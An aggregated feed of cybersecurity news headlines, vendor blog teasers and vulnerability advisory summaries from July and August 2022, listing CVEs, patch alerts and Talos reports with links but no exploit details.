WWBN AVideo aVideoEncoder chunkfile OS command injection vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1546
CVE-2022-30216 - Authentication coercion of the Windows ?Server? service
2022-08-13T08:00:00Z | 1660377600

In this blog, see how an off-by-one error could lead to domain controller access in Microsoft Server Service.

https://www.akamai.com/blog/security-research/authentication-coercion-windows-server-service
The road to the apprenticeship
2022-08-12T13:00:13Z | 1660309213

Finding talent is hard, especially in the blockchain security industry. The space is new, so you won’t find engineers with decades of experience with smart contracts. Training is difficult, as the technology evolves constantly, and online content quickly becomes outdated. There are also a lot of misconceptions about blockchain […]

https://blog.trailofbits.com/2022/08/12/the-road-to-the-apprenticeship/
It?s Time to Protect Every SIM
2022-08-12T13:00:00Z | 1660309200

Ensuring the security of billions of mobile devices is a priority. Learn how Akamai aims to protect and secure every SIM as we continually adapt to new threats.

https://www.akamai.com/blog/security/its-time-to-protect-every-sim
SS8 Networks Launches New Canadian Division to Meet Growing Product Demand
2022-08-11T18:22:55Z | 1660242175

Toronto-based Engineering Team Supports SS8’s Mission to Provide Innovative Lawful Intelligence Solutions MILPITAS, California – August 11, 2022 – SS8 Networks (SS8), a leader in Lawful Intercept, Location, and Monitoring Suite Platforms, today announced the expansion of their software development team as part of an ongoing strategy to support international product demand growth. The new team, located in the […] The post SS8 Networks Launches New Canadian Division to Meet Growing Product Demand appeared first on SS8.

https://www.ss8.com/ss8-networks-launches-new-canadian-division-to-meet-growing-product-demand/
Five Critical Components of your Network Security Architecture Evolution
2022-08-11T14:00:00Z | 1660226400

Networks have had to change with the times and the same is true of network security. Some networks are in the cloud, some are virtual, and some rely on application-to-application connections. We live in a complex hybrid world, which means network security can’t stand still. It has to be more comprehensive, intelligent, and responsive than […] The post Five Critical Components of your Network Security Architecture Evolution appeared first on Corsa Security.

https://www.corsa.com/2022/08/11/five-critical-components-of-your-network-security-architecture-evolution/
Meet Tim Vereecke: Technical Solutions Architect
2022-08-11T13:00:00Z | 1660222800

Tim Vereecke, technical solutions architect at Akamai, discusses how he uses a developer-first mindset to find internet performance solutions.

https://www.akamai.com/blog/developers/meet-tim-vereecke-technical-solutions-architect
Security Alert (A22-08-09): Multiple Vulnerabilities in Cisco Products
2022-08-11T04:00:00Z | 1660190400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Has Addressed Browser-Powered Desync Attacks
2022-08-10T13:00:00Z | 1660136400

On August 10, 2022, security researcher James Kettle presented a set of novel HTTP request smuggling attacks in his Black Hat talk,

https://www.akamai.com/blog/security/akamai-has-addressed-browser-powered-desync-attacks
Feature Spotlight: Extending Zero Trust Segmentation to the MacOS
2022-08-10T13:00:00Z | 1660136400

Announcing our new agent for MacOS endpoints. Of all the leading Zero Trust segmentation providers, Akamai is the only vendor to support MacOS.

https://www.akamai.com/blog/security/extending-zero-trust-segmentation-to-the-macos
Akamai?s Perspective on August Patch Tuesday
2022-08-10T07:00:00Z | 1660114800

Want the rundown of what to focus on with Patch Tuesday in one place? Check out this blog, and patch, patch, patch!

https://www.akamai.com/blog/security-research/patch-tuesday-august-akamai-insights
Olukord küberruumis – juuli 2022
2022-08-10T06:00:00Z | 1660111200

Juulis registreerisime 206 mõjuga intsidenti, mis on viimase poole aasta keskmine tase.

https://ria.ee/uudised/olukord-kuberruumis-juuli-2022
High Threat Security Alert (A22-08-06): Multiple Vulnerabilities in Microsoft Products (August 2022)
2022-08-10T04:00:00Z | 1660104000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-08-07): Multiple Vulnerabilities in VMware Products
2022-08-10T04:00:00Z | 1660104000

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-08-08): Multiple Vulnerabilities in Adobe Reader/Acrobat
2022-08-10T04:00:00Z | 1660104000

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
SonicWall SMA1000 CVE-2021-33909 and CVE-2022-0847
2022-08-09T19:24:37Z | 1660073077

This advisory is intended to address Linux Kernel vulnerability CVE-2021-33909 and CVE-2022-0847 in the SonicWall SMA1000 platform.SonicWall has performed a comprehensive analysis of the SMA1000 platform that resulted in no observable attack vectors for CVE-2021-33909 and CVE-2022-0847. To remove any potential risk from customer environments SonicWall is releasing firmware for the SMA1000 Platform out of an abundance of caution, addressing these vulnerabilities. CVE-2021-33909: fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.CVE-2022-0847:  A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read-only files and as such escalate their privileges on the system.SonicWall SMA1000 Linux kernel has been upgraded to fix version 5.4.187 in the SMA1000 firmware12.4.2-05082 and higher versions. CVE: CVE-2021-33909, CVE-2022-0847 Last updated: Aug. 9, 2022, 7:24 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0015
15 Networking Experts To Follow on LinkedIn
2022-08-09T14:37:56Z | 1660055876

Technology is fast-paced and constantly changing, but it seems like the past few years have broken every record. Covid-19 and the transition to remote work, high-profile cyber security attacks and massive geo-political shifts have enhanced and intensified the need for new networking solutions, and vendors are quick to respond with new networking point solutions which... The post 15 Networking Experts To Follow on LinkedIn appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-15-enterprise-networking-experts-to-follow-2/
Is Your Security Strategy Focused?
2022-08-09T13:00:00Z | 1660050000

Strategic security leadership is the overarching recommendation in ?How to Respond to the 2022 Cyberthreat Landscape,? a new report from Gartner�. Download your complimentary copy in this blog.

https://www.akamai.com/blog/security/is-your-security-strategy-focused
The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes
2022-08-09T08:45:58Z | 1660034758

The post The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes appeared first on Cato Networks.

https://www.catonetworks.com/resources/outcomes-vs-tools-why-sase-is-the-right-strategic-choice-vs-legacy-appliances/
Goals set the pace for cyber exercises
2022-08-08T07:02:32Z | 1659942152

Setting goals is an important part of planning a cyber exercise. Clear goals also guide and engage participants. In this article, we give tips on how to define goals for cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/goals-set-pace-cyber-exercises
Goals set the pace for cyber exercises
2022-08-08T07:02:32Z | 1659942152

Setting goals is an important part of planning a cyber exercise. Clear goals also guide and engage participants. In this article, we give tips on how to define goals for cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/goals-set-pace-cyber-exercises
Security Alert (A22-08-05): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-08-08T04:00:00Z | 1659931200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-33916
2022-08-08T00:00:00Z | 1659916800

CWE-200: Exposure of sensitive information to an unuathorized actor: This security update resolves a vulnerability in the OPC UA .NET Standard Reference Server that leaks sensitive information to unauthenticated Clients.

https://claroty.com/team82/disclosure-dashboard/cve-2022-33916
Building a trusted and Cyber Secure Europe
2022-08-05T00:00:00Z | 1659657600

The European Union Agency for Cybersecurity is dedicated to achieving a high common level of cybersecurity across Europe. For more than 15 years, ENISA has played a key role in enabling digital trust and security across Europe, together with its stakeholders including the Member States and EU bodies and agencies.

https://www.first.org/blog/20220805_building_a_trusted_and_cyber_secure_europe
FIRST Releases Traffic Light Protocol Version 2.0 with important updates
2022-08-05T00:00:00Z | 1659657600

The Forum of Incident Response and Security Team (FIRST) has updated the globally renowned Traffic Light Protocol (TLP) for the cybersecurity industry - a vital system used by organizations all around the world to share sensitive information. The new version of the TLP results from a thorough consultation with over 50 security industry experts over three years with the goals to standardize, unify and modernize the content and language and provide improved supporting materials.

https://www.first.org/newsroom/releases/20220805
Building a trusted and Cyber Secure Europe
2022-08-05T00:00:00Z | 1659657600

The European Union Agency for Cybersecurity is dedicated to achieving a high common level of cybersecurity across Europe. For more than 15 years, ENISA has played a key role in enabling digital trust and security across Europe, together with its stakeholders including the Member States and EU bodies and agencies.

https://www.first.org/blog/20220805_building_a_trusted_and_cyber_secure_europe
FIRST Releases Traffic Light Protocol Version 2.0 with important updates
2022-08-05T00:00:00Z | 1659657600

The Forum of Incident Response and Security Team (FIRST) has updated the globally renowned Traffic Light Protocol (TLP) for the cybersecurity industry - a vital system used by organizations all around the world to share sensitive information. The new version of the TLP results from a thorough consultation with over 50 security industry experts over three years with the goals to standardize, unify and modernize the content and language and provide improved supporting materials.

https://www.first.org/newsroom/releases/20220805
Cybersecurity Issues in the Gaming Industry Portend Metaverse Challenges
2022-08-04T13:00:00Z | 1659618000

The metaverse has greatly expanded the threat landscape. As industries gamify, gaming?s cybersecurity issues become a checklist for the future.

https://www.akamai.com/blog/trends/security-trends-to-address-now-on-our-way-to-the-metaverse
High Threat Security Alert (A22-08-04): Multiple Vulnerabilities in Cisco Products
2022-08-04T04:00:00Z | 1659585600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Why We Acquired Echosec Systems: The OSINT Revolution
2022-08-04T00:01:00Z | 1659571260

Flashpoint CEO Josh Lefkowitz on the Echosec acquisition and the proven, foundational importance of open source intelligence The post Why We Acquired Echosec Systems: The OSINT Revolution appeared first on Flashpoint.

https://flashpoint.io/blog/why-we-acquired-echosec-systems/
High Threat Security Alert (A22-08-02): Multiple Vulnerabilities in VMware Products
2022-08-03T04:00:00Z | 1659499200

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-08-03): Multiple Vulnerabilities in Google Chrome
2022-08-03T04:00:00Z | 1659499200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
ESTsoft Alyac OLE header parsing integer overflow
2022-08-03T00:00:00Z | 1659484800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1527
ESTsoft Alyac OLE header Mini FAT sectors integer overflow
2022-08-03T00:00:00Z | 1659484800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1533
What Is Open Source Intelligence: The Importance of OSINT in Your Organization’s Threat Landscape
2022-08-02T15:31:04Z | 1659454264

Open-source intelligence, or OSINT, refers to the process of gathering information from public, legal data sources to serve a specific function. Some open sources might include social media, blogs, news, and the dark web.  The post What Is Open Source Intelligence: The Importance of OSINT in Your Organization’s Threat Landscape appeared first on Flashpoint.

https://flashpoint.io/blog/what-is-osint-open-source-intelligence/
SSE (Security Service Edge): The Complete Guide to Getting Started
2022-08-02T14:06:03Z | 1659449163

In 2021, Gartner introduced a new security category – SSE (Security Service Edge). In this blog post, we’ll explain what SSE is, how SSE is different from SASE and compare traditional SSE solutions to Cato SSE 360. This blog post is an excerpt from our new Cato SSE 360 whitepaper, but if you’re interested in... The post SSE (Security Service Edge): The Complete Guide to Getting Started appeared first on Cato Networks.

https://www.catonetworks.com/blog/sse-security-service-edge-the-complete-guide-to-getting-started/
Risky Business: Determining Malicious Probabilities Through ASNs
2022-08-02T13:00:00Z | 1659445200

Akamai researchers have analyzed ASNs to determine some shocking stats about the state of malicious IPs and where they are from.

https://www.akamai.com/blog/security/determining-malicious-probabilities-through-asns
Security Alert (A22-08-01): Multiple Vulnerabilities in Android
2022-08-02T04:00:00Z | 1659412800

Google has released Android Security Bulletin August 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
TCL LinkHub Mesh Wifi confers ucloud_add_node_new stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1456
TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1455
TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1458
TCL LinkHub Mesh Wi-Fi confctl_set_wan_cfg denial of service vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1506
TCL LinkHub Mesh Wifi GetValue buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1463
TCL LinkHub Mesh Wifi confctl_get_master_wlan information disclosure vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1504
TCL LinkHub Mesh Wi-Fi confsrv confctl_set_app_language stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1462
TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1482
TCL LinkHub Mesh Wifi confctl_set_guest_wlan denial of service vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1502
TCL LinkHub Mesh Wifi confsrv set_port_fwd_rule stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1454
TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1484
TCL LinkHub Mesh Wifi libcommonprod.so prod_change_root_passwd hard-coded password vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1459
TCL LinkHub Mesh Wifi confctl_get_guest_wlan information disclosure vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1503
TCL LinkHub Mesh Wifi confctl_set_master_wlan denial of service vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1505
TCL LinkHub Mesh Wi-Fi confsrv ucloud_set_node_location stack-based buffer overflow vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1483
TCL LinkHub Mesh Wifi confsrv ucloud_add_node_new OS command injection vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1457
TCL LinkHub Mesh Wifi ucloud_del_node denial of service vulnerability
2022-08-01T00:00:00Z | 1659312000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1507
Security Alert (A22-07-18): Multiple Vulnerabilities in Samba
2022-07-29T04:00:00Z | 1659067200

Samba released security updates to address multiple vulnerabilities in Samba.

https://www.govcert.gov.hk/en/alerts_detail.php
Average Ransom Payment Up 71% This Year, Approaches $1 Million
2022-07-29T00:00:00Z | 1659052800

With the recent release of the 2022 Unit 42 Ransomware Threat Report, we thought it would be a good time to take a quick look at ransomware activity that we’ve seen so far in 2022.

https://www.first.org/blog/20220729_Average_ransom_payment
Average Ransom Payment Up 71% This Year, Approaches $1 Million
2022-07-29T00:00:00Z | 1659052800

With the recent release of the 2022 Unit 42 Ransomware Threat Report, we thought it would be a good time to take a quick look at ransomware activity that we’ve seen so far in 2022.

https://www.first.org/blog/20220729_Average_ransom_payment
NCSC joins US partners to expose global brute force campaign by Russian Intelligence Services
2022-07-28T14:27:08Z | 1659018428

NSA, CISA, FBI and the NCSC publish advice for network defenders to help protect their systems.

https://www.ncsc.gov.uk/news/global-brute-force-campaign-advisory
Advisory: Trickbot
2022-07-28T13:54:05Z | 1659016445

How organisations can protect their networks from the ‘Trickbot’ banking trojan.

https://www.ncsc.gov.uk/news/trickbot-advisory
Shedding smart contract storage with Slither
2022-07-28T13:00:07Z | 1659013207

You think you’ve found a critical bug in a Solidity smart contract that, if exploited, could drain a widely used cryptocurrency exchange’s funds. To confirm that it’s really a bug, you need to figure out the value at an obscure storage slot that has no getter method. Adrenaline courses […]

https://blog.trailofbits.com/2022/07/28/shedding-smart-contract-storage-with-slither/
India Becomes Top Global Target for API Attacks
2022-07-28T13:00:00Z | 1659013200

An increased adoption of APIs also increases the risk of API attacks. Read about how India has become a top global target for API attacks in 2022.

https://www.akamai.com/blog/security/india-becomes-top-global-target-for-api-attacks
The rise of ransomware
2022-07-28T07:50:54Z | 1658994654

Toby L, Technical Lead for Incident Management, explains how modern-day ransomware attacks are evolving.

https://www.ncsc.gov.uk/blog-post/rise-of-ransomware
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report
2022-07-28T06:18:47Z | 1658989127

Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web... The post Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/spring4shell-might-grab-headlines-but-log4j-exploits-swamped-enterprise/
Muutub ID-kaardi kasutajatoe teenindusaeg
2022-07-28T06:00:00Z | 1658988000

Alates 1. augustist võtab ID-kaardi kasutajatugi kõnesid vastu tööpäevadel kella 8.30–17.00ni.

https://ria.ee/uudised/muutub-id-kaardi-kasutajatoe-teenindusaeg
FIRST POST: July - September 2022
2022-07-28T00:00:00Z | 1658966400

Annual FIRST Conference in Dublin, the Republic of Ireland, is a triumph; Dr. Sherif Hashem is the new Chair of FIRST, and four new members join the FIRST Board of Directors; Four new additions to the FIRST Board of Directors; The FIRST 2021-22 Annual Report is now available; FIRST adds a New Director of Community and Capacity Building to the team; 34 new members join FIRST;

https://www.first.org/newsroom/newsletters/FIRST_POST_July_sept_2022.pdf
Fidelis Security Joins the AWS ISV Accelerate Program
2022-07-27T20:30:31Z | 1658953831

(BUSINESS WIRE) – Fidelis Security (Formerly known as Fidelis Cybersecurity), the industry innovator in Active eXtended Detection and Response (XDR) and unified cloud security solutions, trusted by Fortune 500 firms and government organizations worldwide, announced today that it is strengthening its work with Amazon Web Services (AWS) by joining the AWS Independent Software Vendor (ISV) […] The post Fidelis Security Joins the AWS ISV Accelerate Program appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-joins-the-aws-isv-accelerate-program/
Largest European DDoS Attack on Record
2022-07-27T09:00:05Z | 1658912405

On Thursday, July 21st, Akamai detected and mitigated the largest DDoS attack ever launched against a European customer on the Prolexic platform.

https://www.akamai.com/blog/security/largest-european-ddos-attack-ever
'WannaCry' ransomware: guidance updates
2022-07-27T06:36:35Z | 1658903795

Jon L provides an update on the NCSC's guidance on the 'WannaCry' ransomware.

https://www.ncsc.gov.uk/blog-post/wannacry-ransomware-guidance-updates
Security Alert (A22-07-17): Multiple Vulnerabilities in Firefox
2022-07-27T04:00:00Z | 1658894400

Mozilla has published the advisories (MFSA2022-28, MFSA2022-29 and MFSA2022-30) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
FreshTomato httpd unescape memory corruption vulnerability
2022-07-27T00:00:00Z | 1658880000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509
Asuswrt and Asuswrt-Merlin New Gen httpd unescape memory corruption vulnerability
2022-07-27T00:00:00Z | 1658880000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511
DD-WRT httpd unescape memory corruption vulnerability
2022-07-27T00:00:00Z | 1658880000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510
Power Digital Growth with App & API Protector
2022-07-26T13:00:00Z | 1658840400

Experience ?no trade-offs protection? with a free trial of Akamai App & API Protector.

https://www.akamai.com/blog/security/power-digital-growth-with-api-protector
Is SD-WAN Really Dead?
2022-07-26T11:24:04Z | 1658834644

Happy To Announce the Birth of a New Technology – SD-WAN It wasn’t that long ago that we oohed and ahhed over the brand-new technology called SD-WAN. The new darling of the networking industry would free us from the shackles of legacy MPLS services. But just as we’re getting used to the toddling SD-WAN, along... The post Is SD-WAN Really Dead? appeared first on Cato Networks.

https://www.catonetworks.com/blog/is-sd-wan-really-dead/
Using secure messaging, voice and collaboration apps
2022-07-26T06:39:04Z | 1658817544

What organisations should think about before choosing apps for secure communications and collaboration...

https://www.ncsc.gov.uk/blog-post/using-secure-messaging-voice-and-collaboration-apps
Don’t Lose Sleep Over Data Loss with SASE DLP
2022-07-26T06:32:01Z | 1658817121

The post Don’t Lose Sleep Over Data Loss with SASE DLP appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-dont-lose-sleep-over-data-loss-with-sase-dlp
CVE-2022-34907
2022-07-26T00:00:00Z | 1658793600

Team82 has uncovered and disclosed two critical vulnerabilities, CVE-2022-34907 and CVE-2022-34906, in FileWave’s mobile device management (MDM) system. The vulnerabilities are remotely exploitable and enable an attacker to bypass authentication mechanisms and gain full control over the MDM platform and its managed devices. CVE-2022-34907, an authentication bypass flaw exists in FileWave MDM before version 14.6.3 and 14.7.x, prior to 14.7.2. CVE-2022-34906, a hard-coded cryptographic key, exists in FileWave MDM prior to version 14.6.3 and 14.7.x, prior to 14.7.2. Read more: "With Management Comes Risk: Finding Flaws in FileWave MDM"

https://claroty.com/team82/disclosure-dashboard/cve-2022-34907
Why remote access should be a collaboration between network & security
2022-07-25T13:45:39Z | 1658756739

The post Why remote access should be a collaboration between network & security appeared first on Cato Networks.

https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/
Security Alert (A22-07-15): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-07-25T04:00:00Z | 1658721600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-16): Vulnerability in SonicWall Products
2022-07-25T04:00:00Z | 1658721600

SonicWall has released a security advisory to address an unauthenticated SQL injection vulnerability in SonicWall Analytics and GMS products.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-34906
2022-07-25T00:00:00Z | 1658707200

Team82 has uncovered and disclosed two critical vulnerabilities, CVE-2022-34907 and CVE-2022-34906, in FileWave’s mobile device management (MDM) system. The vulnerabilities are remotely exploitable and enable an attacker to bypass authentication mechanisms and gain full control over the MDM platform and its managed devices. CVE-2022-34907, an authentication bypass flaw exists in FileWave MDM before version 14.6.3 and 14.7.x, prior to 14.7.2. CVE-2022-34906, a hard-coded cryptographic key, exists in FileWave MDM prior to version 14.6.3 and 14.7.x, prior to 14.7.2. Read more: "With Management Comes Risk: Finding Flaws in FileWave MDM"

https://claroty.com/team82/disclosure-dashboard/cve-2022-34906
What?s New for Developers: July 2022
2022-07-22T13:00:00Z | 1658494800

This month?s developer update is jam-packed with exciting news, helpful articles, and useful code, including a new Terraform Provider release and much more.

https://www.akamai.com/blog/developers/what-new-for-developers-july-2022
SOARs vs. No-Code Security Automation: The Case for Both
2022-07-22T00:00:00Z | 1658448000

Just a few years ago, security orchestration, automation and response (SOAR) was the new buzzword associated with security modernization. Today, however, SOAR platforms are increasingly assuming a legacy look and feel. Although SOARs still have their place in a modern SecOps strategy, the key to driving SecOps forward today is no-code security automation. Read on to learn what lightweight security automation means, how it compares to SOAR and why SOARs alone won’t help you stay ahead of today’s security threats.

https://www.first.org/blog/20220722_SOARs_vs_No-Code_Security_Automation_The_Case_for_Both
SOARs vs. No-Code Security Automation: The Case for Both
2022-07-22T00:00:00Z | 1658448000

Just a few years ago, security orchestration, automation and response (SOAR) was the new buzzword associated with security modernization. Today, however, SOAR platforms are increasingly assuming a legacy look and feel. Although SOARs still have their place in a modern SecOps strategy, the key to driving SecOps forward today is no-code security automation. Read on to learn what lightweight security automation means, how it compares to SOAR and why SOARs alone won’t help you stay ahead of today’s security threats.

https://www.first.org/blog/20220722_SOARs_vs_No-Code_Security_Automation_The_Case_for_Both
Unauthenticated SQL Injection in SonicWall GMS and Analytics
2022-07-21T19:30:12Z | 1658431812

Improper Neutralization of Special Elements used in an SQL Command leading to Unauthenticated SQL Injection vulnerability, impacting SonicWall GMS and Analytics On-Prem. CVE: CVE-2022-22280 Last updated: Oct. 13, 2022, 7:30 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0007
Is true multi-stakeholderism failing? FIRST fears so.
2022-07-21T13:00:00Z | 1658408400

Last week FIRST learned that it is among a large group of organizations that were rejected from participating in the Open ended Working Group (OEWG) process, despite the groups expressed commitment to work with non-governmental organizations.

https://www.first.org/newsroom/releases/20220721
Security Alert (A22-07-12): Multiple Vulnerabilities in Cisco Products
2022-07-21T04:00:00Z | 1658376000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-13): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-07-21T04:00:00Z | 1658376000

Apple has released iOS 15.6 and iPadOS 15.6 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-14): Multiple Vulnerabilities in Drupal
2022-07-21T04:00:00Z | 1658376000

Drupal has released a security advisory to address multiple vulnerabilities in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
PCI DSS v4.0: Meeting Emerging Needs for Script Monitoring and Management
2022-07-20T13:00:00Z | 1658322000

PCI DSS v4.0 makes Akamai Client-Side Protection & Compliance essential for any customer that processes or transmits cardholder data.

https://www.akamai.com/blog/security/pci-dssv4-meeting-needs-for-script-monitoring-and-management
Dr. Sherif Hashem is the new Chair of FIRST, and four new members join the Board of Directors
2022-07-20T13:00:00Z | 1658322000

A new Chair and four new cyber security experts joined the Forum of Incident Response and Security Team (FIRST) Board of Directors during the recent AGM to serve the 2022-24 term. Current board member Dr. Sherif Hashem was voted in as the new chair and brings extensive knowledge, experience, and international relations to the role.

https://www.first.org/newsroom/releases/20220720
Dr. Sherif Hashem is the new Chair of FIRST, and four new members join the Board of Directors
2022-07-20T13:00:00Z | 1658322000

A new Chair and four new cyber security experts joined the Forum of Incident Response and Security Team (FIRST) Board of Directors during the recent AGM to serve the 2022-24 term. Current board member Dr. Sherif Hashem was voted in as the new chair and brings extensive knowledge, experience, and international relations to the role.

https://www.first.org/newsroom/releases/20220720
Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)?
2022-07-20T11:19:11Z | 1658315951

The Information Revolution and The Growing Importance of Data We have all heard about the information revolution, but what does it actually mean and how profound is it? An interesting way to understand this is by looking at how it has impacted modern enterprises. A company’s assets can be divided into two types: tangible vs... The post Are You Protecting Your Most Valuable Asset with a Data Loss Prevention (DLP)? appeared first on Cato Networks.

https://www.catonetworks.com/blog/protecting-your-most-valuable-asset-with-a-dlp/
RIA värskendas ID-tarkvara
2022-07-20T06:00:00Z | 1658296800

Riigi infosüsteemi amet avaldas 20. juulil ID-tarkvara uue versiooni (2022.6). Suurim muudatus on toe lõppemine Windowsi 32-bitistele operatsioonisüsteemidele.

https://ria.ee/uudised/ria-varskendas-id-tarkvara
Security Alert (A22-07-10): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2022)
2022-07-20T04:00:00Z | 1658289600

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-11): Multiple Vulnerabilities in Google Chrome
2022-07-20T04:00:00Z | 1658289600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-2465
2022-07-19T00:00:00Z | 1658188800

Deserialization of untrusted data may result in arbitrary code execution ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2465
CVE-2022-2464
2022-07-19T00:00:00Z | 1658188800

Directory traversal vulnerability may lead to privilege escalation The parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by ISaGRAF Workbench, can traverse the file system. If successfully exploited, an attacker would be able to overwrite existing files and create additional files with the same permissions of the ISaGRAF Workbench software. User interaction is required for this exploit to be successful.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2464
CVE-2022-2463
2022-07-19T00:00:00Z | 1658188800

Improper input sanitization may lead to privilege escalation ISaGRAF does not sanitize paths specified within the .7z exchange file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .7z exchange file that when opened by ISaGRAF Workbench will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2463
Cyber weather in June continued rainy but sunny spells were also seen
2022-07-18T10:55:50Z | 1658141750

Various scams and phishing campaigns continued actively in June. Network performance was good and there were no serious performance disruptions. Criminals exploited quickly a vulnerability in Microsoft support tools.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa_06/2022
Cyber weather in June continued rainy but sunny spells were also seen
2022-07-18T10:55:50Z | 1658141750

